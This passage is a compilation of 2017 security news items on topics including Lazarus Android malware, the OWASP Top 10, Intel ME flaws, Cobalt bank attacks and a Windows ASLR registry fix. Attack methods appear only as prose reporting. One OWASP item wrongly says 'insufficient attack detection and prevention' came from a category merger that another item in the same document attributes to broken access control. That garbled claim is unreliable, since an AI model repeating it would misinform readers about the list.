This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

The malicious code used in this last campaign is an Android malware delivered as an APK file that has been designed to mimic a Korean bible app that was published in the Google Play by a developer named GODpeople.

The malicious APK wasn’t available on the Google Play store and it is still unclear how the APT distributed it.

“The McAfee Mobile Research team recently examined a new threat, Android malware that contains a backdoor file in the executable and linkable format (ELF). The ELF file is similar to several executables that have been reported to belong to the Lazarus cybercrime group. (For more on Lazarus, read this post from our Advanced Threat Research Team.)” states McAfee.

“The malware poses as a legitimate APK, available from Google Play, for reading the Bible in Korean. The legit app has been installed more than 1,300 times. The malware has never appeared on Google Play, and we do not know how the repackaged APK is spread in the wild.”

Lazarus APT APK

According to McAfee, the malware delivers a backdoor as an executable and linkable format (ELF) file, it allows to take full control of the infected device.

The list of command and control (C&C) servers used by the Android backdoor includes IP addresses previously associated with to the Lazarus group.

Lazarus APT APK 2.png

Experts from Palo Alto Networks pointed out that the campaign appears to be aimed at Samsung device owners in South Korea.

“Unit 42 has discovered a new cluster of malware samples, which targets Samsung devices and Korean language speakers, with relationships to the malware used in Operation Blockbuster. The specific points of connection between these new samples and Operation Blockbuster include:

payloads delivered by the macros discussed in Operation Blockbuster Sequel
malware used by the HiddenCobra threat group
malware used in the 2016 attack on the Bangladesh SWIFT banking system
APK samples mimicking legitimate APKs hosted on Google Play”
states the analysis from Palo alto Networks.

Experts from Unit 42 analyzed a PE file uploaded to VirusTotal that was used to deliver ELF ARM files and APK files from an HTTP server. The APK allows the attacker to gain full control on the target device.

Palo Alto Networks has collected evidence that links the malware with the Lazarus’s attack on the SWIFT banking system and the on Operation Blockbuster. The C&C infrastructure used in the latest attack is the same used in Lazarus’s campaigns.

“It is clear that source code was reused between previously reported samples and the cluster of new samples outlined by Unit 42. Additionally, command and control IPv4 addresses were reused by the malware discussed in this analysis. Technical indicators as well as soft indicators, such as APK themes and names, provide soft and tenable ties to the actors behind Operation Blockbuster and the HiddenCobra group.” concluded Palo alto Networks.

2017 OWASP Top 10 Final Release is out, what’s new?
22.11.2017 securityaffairs

The Open Web Application Security Project (OWASP) presented the final release for the 2017 OWASP Top 10.
The Open Web Application Security Project (OWASP) published the final version of the 2017 OWASP Top 10. In April, the OWASP announced the first release candidate for the 2017 OWASP Top 10, the main novelty was represented by the presence of the following two new vulnerability categories.

“insufficient attack detection and prevention”
“unprotected APIs.”
The 2017 OWASP Top 10 is based on data from 23 contributors covering more than 114,000 applications. OWASP published on GitHub the data used for its report.

The categories have been selected based on the risk they pose, but what are the application Security Risks?

“Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.” states the OWASP.

“Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult. “

The OWASP Top 10 vulnerabilities are injection, broken authentication, sensitive data exposure, XML external entity (XXE), broken access control, security misconfiguration, cross-site scripting (XSS), insecure deserialization, using components with known vulnerabilities, and insufficient logging and monitoring.

The “insufficient attack detection and prevention” results from the merger of the current 4th and 7th items, “Insecure direct object references” and the “Missing Function Level Access Control.”

The categories have been merged into the item “Broken access control” that was dated back in 2004.

2017 OWASP Top 10 Final

The OWASP left the Cross-Site Scripting (XSS) in a separate category, while it removed the Cross-site request forgery (CSRF) because it is addressed by as modern development frameworks. It was found that the CSRF affected less than 5% of applications, meanwhile Unvalidated redirects and forwards has been found in around 8% of apps and for this reason it was removed too.

News entries are XXE, insecure deserialization, and insufficient logging and monitoring, this latter represents a serious problem for many organizations.

Google Collects Android Location Data Even When Location Service Is Disabled
21.11.2017 thehackernews Android

Do you own an Android smartphone?
If yes, then you are one of those billions of users whose smartphone is secretly gathering location data and sending it back to Google.
Google has been caught collecting location data on every Android device owner since the beginning of this year (that's for the past 11 months)—even when location services are entirely disabled, according to an investigation conducted by Quartz.
This location-sharing practice doesn't want your Android smartphone to use any app, or turn on location services, or even have a SIM card inserted.
All it wants is to have your Android device to be connected to the Internet.
The investigation revealed that Android smartphones have been collecting the addresses of nearby cellular towers, and this data could be used for "Cell Tower Triangulation"—a technique widely used to identify the location of a phone/device using data from three or more nearby cell towers.
Each time your Android device comes within the range of a new cell tower, it gathers the cell tower address and sends this data back to Google when the device is connected to a WiFi network or has a cellular data enabled.
Since the component responsible for collecting location data resides in Android's core Firebase Cloud Messaging service that manages push notifications and messages on the operating system, it cannot be disabled and doesn't rely on what apps you have installed—even if you factory reset your smartphone or remove the SIM card.
When Quartz contacted the tech giant about this location-sharing practice, Google spokesperson replied: "We began looking into using Cell ID codes as an additional signal to further improve the speed and performance of message delivery."
Although it is still unknown how cell-tower data that helps identify a specific cell tower could have been helped Google improve message delivery, the fact that the company's mobile operating system is collecting location data is a complete violation of user's privacy.
Even in its privacy policy about location sharing, Google mentions that it will collect location information from devices that use its services, but has not indicated whether the company will collect data from Android devices when all location services are disabled.
"When you use Google services, we may collect and process information about your actual location," Google's privacy policy reads.
"We use various technologies to determine location, including IP address, GPS, and other sensors that may, for example, provide Google with information on nearby devices, Wi-Fi access points, and cell towers."
Moreover, this location-sharing practice is not limited to any particular Android phone model or manufacturer, as the tech giant was apparently collecting cell tower data from all modern Android devices before being contacted by Quartz.
Although the company said that it never used or stored this location data it collected on its users and that it is now taking steps to end this practice, this data could be used to target location-based advertisement when the user enters any store or restaurant.
According to Google, Android phones will no longer gather and send cell-tower location data back to Google by the end of this month.

Tether Hacked — Attacker Steals $31 Million of Digital Tokens
21.11.2017 thehackernews CyberCrime

Again some bad news for cryptocurrency users.
Tether, a Santa Monica-based start-up that provides a dollar-backed cryptocurrency tokens, has claimed that its systems have been hacked by an external attacker, who eventually stole around $31 million worth of its tokens.
With a market capitalization of $673 million, Tether is the world's first blockchain-enabled platform to allow the traditional currency to be used like digital currency.
Tether serves as a proxy for the US dollar, Euro (and soon Japanese yen) that can be sent between exchanges including Bitfinex, Poloniex, Omni, GoCoin and other markets.
According to an announcement on the company's official website posted today, the unknown hacker stole the tokens (worth $30,950,010) from the Tether Treasury wallet on November 19 and sent them to an unauthorized Bitcoin address.
The stolen tokens will not be redeemed, but the company is in the process of attempting token recovery in order to prevent them from entering the broader cryptocurrency market.
The attacker is holding stolen funds at the following bitcoin address:
So, in case, you receive any USDT (that's what Tether calls its platform's USD currency; 1USDT=1USD) "tokens from the above address, or from any downstream address that receives these tokens, do not accept them, as they have been flagged and will not be redeemable by Tether for USD," the company warned.
Bitcoin price dropped as much as 5.4 percent, the most since November 13.
To prevent the stolen coins from moving from the attacker's address, the company has temporarily suspended its back-end wallet service and also provided a new version of its software.
"Accordingly, any and all exchanges, wallets, and other Tether integrators should install this software immediately in order to prevent loss: https://github.com/tetherto/omnicore/releases/tag/0.2.99.s," the company said.
The Tether Team has also ensured that Tether issuances have not been affected by this attack, and all of its tokens remain fully backed by assets in the Tether reserve.
Instead, the only tokens that won't be redeemed at this moment are those stolen from Tether treasury yesterday. However, these tokens will be returned to treasury once the software enhancements are in place.
Tether is also undertaking a thorough investigation of the incident in an attempt to prevent similar attacks in the future.
This incident is the latest in a long list of attacks against the cryptocurrency markets. Just last week, about $300 million worth of Ether from dozens of Ethereum wallets was permanently locked up after someone triggered a flaw in Parity multi-sig wallets.

Critical Flaws in Intel Processors Leave Millions of PCs Vulnerable
21.11.2017 thehackernews

In past few months, several research groups have uncovered vulnerabilities in the Intel remote administration feature known as the Management Engine (ME) which could allow remote attackers to gain full control of a targeted computer.
Now, Intel has admitted that these security vulnerabilities could "potentially place impacted platforms at risk."
The popular chipmaker released a security advisory on Monday admitting that its Management Engine (ME), remote server management tool Server Platform Services (SPS), and hardware authentication tool Trusted Execution Engine (TXE) are vulnerable to multiple severe security issues that place millions of devices at risk.
The most severe vulnerability (CVE-2017-5705) involves multiple buffer overflow issues in the operating system kernel for Intel ME Firmware that could allow attackers with local access to the vulnerable system to "load and execute code outside the visibility of the user and operating system."
The chipmaker has also described a high-severity security issue (CVE-2017-5708) involving multiple privilege escalation bugs in the operating system kernel for Intel ME Firmware that could allow an unauthorized process to access privileged content via an unspecified vector.
Systems using Intel Manageability Engine Firmware version 11.0.x.x, 11.5.x.x, 11.6.x.x, 11.7.x.x, 11.10.x.x and 11.20.x.x are impacted by these vulnerabilities.
For those unaware, Intel-based chipsets come with ME enabled for local and remote system management, allowing IT administrators to remotely manage and repair PCs, workstations, and servers within their organization.
As long as the system is connected to a line power and a network cable, these remote functions can be performed out of band even when the computer is turned off as it operates independently of the operating system.
Since ME has full access to almost all data on the computer, including its system memory and network adapters, exploitation of the ME flaws to execute malicious code on it could allow for a complete compromise of the platform.
"Based on the items identified through the comprehensive security review, an attacker could gain unauthorised access to the platform, Intel ME feature, and third party secrets protected by the ME, Server Platform Service (SPS), or Trusted Execution Engine (TXE)," Intel said.
Besides running unauthorized code on computers, Intel has also listed some attack scenarios where a successful attacker could crash systems or make them unstable.
Another high-severity vulnerability involves a buffer overflow issue (CVE-2017-5711) in Active Management Technology (AMT) for the Intel ME Firmware that could allow attackers with remote Admin access to the system to execute malicious code with AMT execution privilege.
AMT for Intel ME Firmware versions 8.x, 9.x, 10.x, 11.0.x.x, 11.5.x.x, 11.6.x.x, 11.7.x.x, 11.10.x.x and 11.20.x.x are impacted by this vulnerability.
The worst part is that it's almost impossible to disable the ME feature to protect against possible exploitation of these vulnerabilities.
"The disappointing fact is that on modern computers, it is impossible to completely disable ME," researchers from Positive Technologies noted in a detailed blog post published late August. "This is primarily due to the fact that this technology is responsible for initialization, power management, and launch of the main processor."
Other high severity vulnerabilities impact TXE version 3.0 and SPS version 4.0, leaving millions of computers with the feature at risk. These are described as:
High Severity Flaws in Server Platform Service (SPS)
CVE-2017-5706: This involves multiple buffer overflow issues in the operating system kernel for Intel SPS Firmware that could allow attackers with local access to the system to execute malicious code on it.
CVE-2017-5709: This involves multiple privilege escalation bugs in the operating system kernel in Intel SPS Firmware that could allow an unauthorized process to access privileged content via an unspecified vector.
Both the vulnerabilities impact Intel Server Platform Services Firmware 4.0.x.x.
High Severity Flaws in Intel Trusted Execution Engine (TXE)
CVE-2017-5707: This issue involves multiple buffer overflow flaws in the operating system kernel in Intel TXE Firmware that allow attackers with local access to the system to execute arbitrary code on it.
CVE-2017-5710: This involves multiple privilege escalation bugs in the operating system kernel in Intel TXE Firmware that allow an unauthorized process to access privileged content via an unspecified vector.
Both the vulnerabilities impact Intel Trusted Execution Engine Firmware 3.0.x.x.
Affected Intel Products
Below is the list of the processor chipsets which include the vulnerable firmware:
6th, 7th and 8th Generation Intel Core processors
Xeon E3-1200 v5 and v6 processors
Xeon Scalable processors
Xeon W processors
Atom C3000 processors
Apollo Lake Atom E3900 series
Apollo Lake Pentiums
Celeron N and J series processors
Intel has issued patches across a dozen generations of CPUs to address these security vulnerabilities that affect millions of PCs, servers, and the internet of things devices, and is urging affected customers to update their firmware as soon as possible.
The chipmaker has also published a Detection Tool to help Windows and Linux administrators check if their systems are exposed to any threat.
The company thanked Mark Ermolov and Maxim Goryachy from Positive Technologies Research for discovering CVE-2017-5705 and bringing it to its attention, which forced the chipmaker to review its source code for vulnerabilities.

Using Unsecured IoT Devices, DDoS Attacks Doubled in the First Half of 2017
21.11.2017 securityaffairs

According to a report recently published by the security firm Corero the number of DDoS Attacks doubled in the First Half of 2017 due to unsecured IoT.
Denial of Service (DoS) attacks have been around as long as computers have been networked. But if your business relies on the Internet to sell products or collaborate, a DoS attack is more than a nuisance, it can be critical.

Over the past few years, the number of DoS attacks has continued to slowly grow in a “cat and mouse” evolution — bad actors get a slightly stronger attack, and network vendors come up with slightly more resilient equipment to defend. Generally the attacks came from botnets comprised of infected computers and servers. The cost of acquiring and keeping these systems in the botnet was relatively expensive, so there was an economic limiter on how fast the attacks would grow. Then Mirai happened in 2016 and everything changed.

The Mirai botnet didn’t struggle with corporate security teams and technical security controls like anti virus software and firewalls.


Instead, it focused on the millions of Internet of Things (IoT) devices like webcams and Internet routers in the home to build the botnet. With no security controls to overcome, the Mirai botnet was able to grow and launch Distributed Denial of Service (DDoS) attacks larger than ever seen before. A high-profile attack against Internet journalist Brian Krebs signaled that things had changed, then the October 2016 attack against DNS provider Dyn, showed how devastating a DDoS attack can be. And in the world of a cyber criminal, devastating is where the profit opportunities lie.

According to an Arbor Networks’ report at the end of 2016, “In 2016, IoT botnets emerged as a source of incredibly high volume DDoS attacks. So far these massive attacks have not leveraged reflection/amplification techniques. They are simply taking advantage of the sheer number of unsecured IoT devices that are deployed today.” (PDF) The report goes on to highlight that the number of DDoS attacks was up significantly over 2015 and the average size and time of the attack has also increased. “The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016,” according to Kaspersky’s DDoS Intelligence Report for Q4 2016. Knowing that cyber crime is fueled by profit motives now, it is safe to assume that the cyber criminals have figured out how to monetize the IoT threat and we can expect this growing trend in attacks to continue.

We have confirmation of this trend from DDos prevention provider, Corero. According to their most recent analysis, “Organizations are now experiencing an average of 8 DDoS attack attempts per day, up from 4 per day at the beginning of 2017, fueled by unsecured IoT devices and DDoS-for-hire services.” Massive DDoS attacks are getting all of the press attention, but they are only part of the story. What is most interesting about the analysis, however, is the discovery that, “A fifth of the DDoS attack attempts recorded during Q2 2017 used multiple attack vectors. These attacks utilize several techniques in the hope that one, or the combination of a few, can penetrate the target network’s security defenses.” In other words, the criminals’ objective often isn’t the denial of service, but using overwhelming noise at the perimeter to hide malware injection and data exfiltration activities.

DDoS has joined other cyber crimes as a well established, profitable exploitation technology. For as little as $20 per hour, anyone can take advantage of DDoS-as-a-Services and launch an attack at their target of choice. The opportunity to profit from Ransom Denial of Service, where companies pay to avoid being DDoS’d, to using DDoS as a mask for other profitable cyber crime activities means we haven’t seen the end of the growing trend in Denial of Service attacks.

Cobalt Hackers Now Targeting Banks Directly
21.11.2017 securityweek Hacking
The notorious Cobalt hackers have shown a change in tactics recently, switching their attacks to targeting banks themselves, instead of bank customers, Trend Micro reports.

Newly observed attacks appear to be part of a larger campaign that started in June and July with the targeting of Russian-speaking businesses. The techniques used are consistent with those associated with the Cobalt hacking group, but new infection chains were observed in recent incidents that targeted the bank’s employees.

Named after multifunctional penetration testing tool Cobalt Strike, the hacking group has been hitting ATMs and financial institutions across Europe. Unlike other groups that avoid Russia or Russian-speaking countries, Cobalt appears to be using the region as a testing ground for new malware and techniques, the same as the Lurk cybercriminal group, Trend Micro notes.

Last year, Russian authorities arrested 50 individuals associated with the use of the Lurk banking Trojan and supposedly took down the Angler exploit kit in the process.

In the recent attacks, the Cobalt group has been using a different vulnerability than before and also started targeting the banks themselves with spear phishing emails. The hackers are now masquerading as the customers of their targets, as a state arbitration court, and as an anti-fraud and online security company.

The group used a Rich Text Format (RTF) document with malicious macros in an attack on August 31, but switched to an exploit for CVE-2017-8759 in spam runs observed on September 20 to 21. Patched in September last year, the flaw is a code injection/remote code execution vulnerability in Microsoft’s .NET Framework.

The Cobalt hackers used this vulnerability to drop and execute Cobalt Strike from a remote server they controlled. Previously, the security bug was used to deliver the FinFisher spyware, but Trend Micro says that other threat actors have been using it of late, including the cyberespionage group ChessMaster.

As part of the attacks leveraging macro-laden RTF files, a PowerShell command is executed to retrieve a dynamic-link library (DLL) file, and odbcconf.exe, a command-line utility related to Microsoft Data Access Components, is used. The DLL drops and executes a malicious JScript using regsvr32.exe, and another JScript is dropped and executed.

The code was designed to receive backdoor commands from a remote server, and the security researchers observed it receiving a PowerShell command to download Cobalt Strike, as well as attempting to connect to a command and control (C&C) server located in France.

Infections involving CVE-2017-8759 flaw start with RTF attachments too, designed to download a Simple Object Access Protocol (SOAP) Web Services Description Language (WSDL) definition from a remote server. The code is injected into memory and downloads and executes Cobalt Strike, which in turn connects to the C&C and waits for commands.

“Many security technologies and security researchers may be utilizing newer detection mechanisms, but cybercriminals are also keeping up, adjusting their tactics to evade them. In Cobalt’s case, for instance, they’ve looked into instances of valid Windows programs or utilities as conduits that allow their malicious code to bypass whitelisting,” the security researchers note.

Mitigation techniques involve securing the use of built-in interpreters or command-line applications, such as PowerShell, odbcconf.exe, and regsvr.exe; keeping systems patched and updated at all times; securing email gateways; using network segmentation to prevent lateral movement; monitoring the network and endpoint for anomalous activities.

Intel Chip Flaws Expose Millions of Devices to Attacks
21.11.2017 securityweek
Intel has conducted an in-depth security review of its Management Engine (ME), Trusted Execution Engine (TXE) and Server Platform Services (SPS) technologies and discovered several vulnerabilities. The company has released firmware updates, but it could take some time until they reach the millions of devices exposed to attacks due to these flaws.

Intel’s ME solution, which some members of the industry have classified as a backdoor, allows users to remotely manage computers via the Intel Active Management Technology (AMT).

Earlier this year, Embedi researchers discovered a critical privilege escalation vulnerability affecting AMT and some related services, specifically Small Business Technology (SBT) and Standard Manageability. Positive Technologies has also reported finding some potentially serious flaws in ME.

As a result of these findings, Intel has decided to perform a comprehensive security audit of ME, along with two other products. These are TXE, which is designed to ensure that a platform and its operating system are authentic and the OS is running in a trusted environment, and SPS, which allows remote server management.

The review led to the discovery of seven vulnerabilities that can be exploited to impersonate the ME, SPS and TXE services and impact the validity of local security feature attestation, execute arbitrary code without being detected by the user or the operating system, and crash the system or make it unstable.

One of the high severity flaws described in Intel’s advisory, CVE-2017-5705, is a local code execution issue found by Positive Technologies in ME.

According to Intel, ME is also affected by buffer overflows and other types of vulnerabilities that can be exploited for privilege escalation (CVE-2017-5708), local code execution (CVE-2017-5711), and remote code execution (CVE-2017-5712).

The kernel of Intel SPS is impacted by a couple of high severity flaws that can be exploited for local code execution (CVE-2017-5706), and gaining access to privileged content (CVE-2017-5709).

As for TXE, the tech giant discovered privilege escalation (CVE-2017-5710) and local code execution (CVE-2017-5707) vulnerabilities that have also been rated high severity.

Intel has not made public any details about the vulnerabilities, but Google security expert Matthew Garrett has shared some thoughts on the possible impact and concluded that the flaws are unlikely to be harmless.

Systems using ME firmware versions 11.0, 11.5, 11.6, 11.7, 11.10 and 11.20, SPS version 4.0, and TXE version 3.0 are impacted. The list of affected products includes some Core, Xeon, Atom, Pentium and Celeron processors, which are found in millions of devices.

Intel has released firmware updates that patch the vulnerabilities, along with a tool that allows users to see if their systems are affected. The company has advised customers to check their system OEMs website for the firmware updates, but, for the time being, only Lenovo appears to have released firmware updates.

Final Version of 2017 OWASP Top 10 Released
21.11.2017 securityweek
The final version of the 2017 OWASP Top 10 was released on Monday and some types of vulnerabilities that don’t longer represent a serious risk have been replaced with issues that are more likely to pose a significant threat.

The Open Web Application Security Project (OWASP) announced the first release candidate for the 2017 OWASP Top 10 back in April, and there has been a lot of debate about what should and what should not be included.

One significant change compared to the 2013 OWASP Top 10 is the fact that the types of flaws that made it into the 2017 list have been selected based on the risk they pose.

The OWASP Top 10 vulnerabilities are injection, broken authentication, sensitive data exposure, XML external entity (XXE), broken access control, security misconfiguration, cross-site scripting (XSS), insecure deserialization, using components with known vulnerabilities, and insufficient logging and monitoring.

OWASP top 10 2017

While XSS can be classified as a type of injection, the decision has been made to leave it in a separate category as these types of bugs are addressed differently compared to SQL and OS command injections.

Cross-site request forgery (CSRF) has been removed from the OWASP Top 10 as modern development frameworks ensure that such vulnerabilities are avoided, which has led to CSRF being found in less than 5% of applications. Unvalidated redirects and forwards have also been removed as they affect only around 8% of apps.

Insecure direct object references (IDOR) and missing function level access control have been merged into broken access control.

The free spots were filled by XXE, insecure deserialization, and insufficient logging and monitoring. Critical deserialization flaws have been found in several high profile apps in the past few years so it’s not surprising that it made the list. As for logging and monitoring, OWASP pointed out that many organizations have serious problems in this department, as clearly demonstrated by the significant number of breaches discovered by third-parties instead of the targeted organization itself.

OWASP also noted that while the names of some categories have not changed, the types of issues they cover has changed. For instance, sensitive data exposure refers to privacy and personal information exposure, not leaky headers and stack traces, and misconfigurations now also include cloud-related issues such as unprotected storage containers (e.g. AWS S3 buckets).

The 2017 OWASP Top 10 is based on data from 23 contributors covering more than 114,000 applications. The data has been made available on GitHub, a move that is part of OWASP’s efforts to be more transparent.

After a break, OWASP will start working on the next Top 10, which has been scheduled for 2020.

U.S. Charges Iranian Over 'Game of Thrones' HBO Hack
21.11.2017 securityweek BigBrothers
The United States on Tuesday charged an Iranian computer whiz with hacking into HBO, stealing scripts and plot summaries for "Games of Thrones," and trying to extort $6 million in Bitcoin out of the network.

US prosecutors in New York unveiled a seven-count indictment against Behzad Mesri, whom they identified as an Iran-based hacker who also goes by the name Skote Vahshat. Mesri is still at large, a spokesman for the US Attorney's office in Manhattan told AFP.

Mesri is accused of orchestrating a hack of HBO from May to August, then threatening to release stolen data unless the premium cable network paid a $6 million ransom in the digital currency Bitcoin.

US prosecutors say he stole scripts and plot summaries for then unaired episodes of the global smash hit "Game of Thrones" series, and unaired episodes for multiple other shows, including the "Curb Your Enthusiasm" comedy series.

He is accused of compromising multiple user accounts, and in July of sending an anonymous email to HBO personnel saying: "Hi to All losers! Yes it's true! HBO is hacked!... Beware of heart Attack!!!"

Mesri leaked some of the stolen data over the Internet onto websites he controlled, US federal prosecutors allege.

The Iranian suspect faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.

US prosecutors accuse Mesri of previously conducting computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

They also said he was a member of the Iranian-based Turk Black Hat Security hacking group, targeting hundreds of websites in the United States and around the world.

North Korean Hackers Target Android Users in South
21.11.2017 securityweek BigBrothers
At least two cybersecurity firms have noticed that the notorious Lazarus threat group, which many experts have linked to North Korea, has been using a new piece of Android malware to target smartphone users in South Korea.

Both McAfee and Palo Alto Networks published blog posts on Monday describing the latest campaign attributed to the threat actor also known as Hidden Cobra. The group is believed to be responsible for several high-profile attacks, including ones targeting Sony and financial institutions, and possibly even the recent WannaCry ransomware attack. Some of the operations tied to this group are Operation Blockbuster, Dark Seoul and Operation Troy.

The malware sample analyzed by McAfee, delivered as an APK file, has been designed to mimic a Korean bible app made available on Google Play by a developer named GODpeople. However, the malicious application did not make it onto the official app store and it’s unclear what method of distribution has been used.

“GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea,” explained McAfee’s Christiaan Beek and Raj Samani.

McAfee said the malware, which has been around since at least March, delivers a backdoor as an executable and linkable format (ELF) file. The backdoor allows hackers to collect information about the infected device, download and upload files, and execute commands. The list of command and control (C&C) servers used by the malware includes IP addresses previously linked to the Lazarus group.

Palo Alto Networks has not shared any information about the applications used to deliver the malware, but the company pointed out that the operation appears to be aimed at Samsung device users in South Korea.

The firm’s analysis started with a PE file uploaded to VirusTotal. This file is designed to deliver ELF ARM files and APK files from an HTTP server. The APK that represents the final payload provides backdoor capabilities and allows its operator to spy on the targeted user by recording audio via the microphone, capturing images via the camera, uploading and downloading files, harvesting GPS information, reading contacts, collecting SMS and MMS messages, recording browsing history, and capturing Wi-Fi information.

Palo Alto Networks has also found links between the malware and the Lazarus group, particularly to malware and infrastructure used in attacks on the SWIFT banking system and activities described in reports on Operation Blockbuster.

This is not the first time North Korea has reportedly targeted mobile users in the South. Back in 2014, South Korea’s National Intelligence Service said more than 20,000 smartphones had been infected that year with a piece of malware traced back to North Korea.

The reports from McAfee and Palo Alto Networks come less than a week after the U.S. Department of Homeland Security (DHS) published a report on a Hidden Cobra malware tracked as FALLCHILL.

Windows 8 and newer versions fail to properly implement ASLR
21.11.2017 securityaffairs Safety

CC/CERT is warning the Address Space Layout Randomisation (ASLR) isn’t properly implemented in versions of Microsoft Windows 8 and newer.
The researcher Will Dormann from the Carnegie-Mellon CERT has discovered the Address Space Layout Randomisation (ASLR) isn’t properly implemented in versions of Microsoft Windows 8 and newer.

15 Nov

Matt Miller
Replying to @wdormann and 3 others
It is possible to enable bottom-up ASLR system-wide, but I'm not sure if it can be done via the WDEG UI, @markwo might know. Agree with your feedback here. I passed it on to the team.

Will Dormann
Actually, with Windows 7 and EMET System-wide ASLR, the loaded address for eqnedt32.exe is different on every reboot. But with Windows 10 with either EMET or WDEG, the base for eqnedt32.exe is 0x10000 EVERY TIME.
Conclusion: Win10 cannot be enforce ASLR as well as Win7! pic.twitter.com/Jp10nqk1NQ

View image on TwitterView image on TwitterView image on TwitterView image on Twitter
The Address Space Layout Randomization (ASLR Protection) is a security mechanism used by operating systems to randomize the memory addresses used by key areas of processes, it makes hard for attackers to find the memory location where to inject their malicious code.

The Address Space Layout Randomisation is particularly effective against stack and heap overflows and is able to prevent arbitrary code execution triggered by any other buffer overflow vulnerability. The security measures are present in almost any modern operating system, including Windows, Linux, macOS, and Android.

Applications running on Windows 8 and newer versions were allocated addresses with zero entropy, this means that it was possible to predict where the code is allocated in memory due to the failure of the randomisation. Windows 10 has the problem, too.

The CERT/CC published a security advisory late last, Dormann found the ASLR issue while he was analyzing a recently fixed bug in Microsoft’s equation editor, tracked as CVE-2017-11882, that could be exploited by remote attackers to install a malware without user interaction.

“Microsoft Windows 8 introduced a change in how system-wide mandatory ASLR is implemented. This change requires system-wide bottom-up ASLR to be enabled for mandatory ASLR to receive entropy. Tools that enable system-wide ASLR without also setting bottom-up ASLR will fail to properly randomise executables that do not opt in to ASLR.” states the security advisory.

According to the CERT, the bug only affects applications using mandatory ASLR, while applications that used opt-in Address Space Layout Randomisation and that never used ASLR aren’t affected.

According to the CERT/CC the problem was introduced with Windows 8 with a change in the mandatory Address Space Layout Randomisation implementation.

“Starting with Windows 8, system-wide mandatory ASLR is implemented differently than with prior versions of Windows. With Windows 8 and newer, system-wide mandatory ASLR is implemented via the

binary registry value. The other change introduced with Windows 8 is that system-wide ASLR must have system -wide bottom-up ASLR enabled to supply entropy to mandatory ASLR.” continues the advisory.

The CERT explained that both EMET and Windows Defender Exploit Guard can enable mandatory Address Space Layout Randomisation for code that isn’t linked with the

“Both EMET and Windows Defender Exploit Guard enable system-wide ASLR without also enabling system-wide bottom-up ASLR. Although Windows Defender Exploit guard does have a system-wide option for system-wide bottom-up-ASLR, the default GUI value of “On by default” does not reflect the underlying registry value (unset).” states the advisory.

“This causes programs without
to get relocated, but without any entropy. The result of this is that such programs will be relocated, but to the same address every time across reboots and even across different systems.”

Address Space Layout Randomisation

16 Nov

Matt Miller
Replying to @wdormann
Set bit 15 (0x10000) in HKLM\System\CurrentControlSet\Control\Session Manager\Kernel\MitigationOptions (REG_QWORD). The WDEG team is looking at how to better support this from the UI.

Will Dormann
Or for those not proficient in setting bits in binary registry values (such as myself), either manually set the values indicated in this picture, or if you don't care about clobbering any existing system-wide mitigations, import this .REG file:https://gist.github.com/wdormann/43cffbf823b5c5da8682985ef31c16a9 … pic.twitter.com/i4YNpET0wq

View image on Twitter
Replies 3 3 Retweets 7 7 likes
Twitter Ads info and privacy
Dormann explained that sysadmins can set a registry value to force bottom-up Address Space Layout Randomisation.

“The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workaround:
Enable system-wide bottom-up ASLR on systems that have system-wide mandatory ASLR

To enable both bottom-up ASLR and mandatory ASLR on a system-wide basis on a Windows 8 or newer system, the following registry value should be imported:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\kernel]
"MitigationOptions"=hex:00,01,01,00,00,00,00,00,00,00,00,00,00,00,00,00" concludes the CC/CERT

A massive cyber attack hit the Algerian state telecom operator Algerie Telecom
21.11.2017 securityaffairs Cyber

The Algerian state telecom operator Algerie Telecom was hit by a series of cyber attacks aimed to hack and disrupt its system.
The Algerian state telecom operator Algerie Telecom confirmed on Friday that it was hit by a series of cyber attacks aimed to hack and disrupt its system.

The company was able to repel the attack and security services managed to identify and arrest the attackers.

At the time of writing, there are no further details about the attacks or the motivation of the hackers.

According to a statement issued by the company, its staff was able to protect the operational infrastructure with the help of security services.

Algerian state telecom operator Algerie Telecom

The rapid increase in the number of cyber attacks is raising concerns in Algeria especially over the security of recently launched services, such as the recently adopted e-payment system for electricity and water bills.

“Iman Houda Faraoun, Minister of Post, Information and Communication Technologies and Digital Economy, said the e-commerce bill, which had been approved by the Council of Ministers, will come into force as soon as it is approved by the parliament.” reported the Xinhuanet.com website.

“She promised that the e-commerce process will be fully protected, as e-financial transactions data, invoices and postal and bank cards will remain confidential.”

Secureworks Releases Open Source IDS Tools
21.11.2017 securityweek Security
Secureworks has released two open source tools, Flowsynth and Dalton, designed to help analysts test rules for intrusion detection systems (IDS) and intrusion prevention systems (IPS) such as Snort and Suricata.

Dalton allows users to quickly and easily run network packet capture (pcap) files against IDS/IPS engines using bespoke rules and/or existing rulesets.

Common use cases for Dalton include testing ruleset coverage, developing and troubleshooting signatures, testing configuration changes, testing variable changes, testing specific IDS engine behavior, and creating custom packet captures.

Dalton includes a controller component, which provides a web interface and an API for retrieving job results and communicating with agents. These agents, which represent the second component of the tool, run on IDS sensors and provide an interface between the controller and the IDS engine.

The second tool released as open source by Secureworks is Flowsynth, which complements Dalton by making it easier for users to quickly model network traffic and generate custom pcaps.

“Flowsynth rapidly models network traffic and generates libpcap-formatted packet captures. It leverages the Scapy packet manipulation tool, but Flowsynth's input is a text-based, structured intermediate language that is simple to create and understand. It allows for programmatic network flow definitions as well as ad hoc and custom network traffic creation,” Secureworks explained.

The Dalton controller includes a web-based user interface that connects the tool to Flowsynth and allows the created pcaps to be easily sent to Dalton for testing.

The documentation and examples provided by Secureworks are specifically made for Suricata and Snort, both of which are also open source.

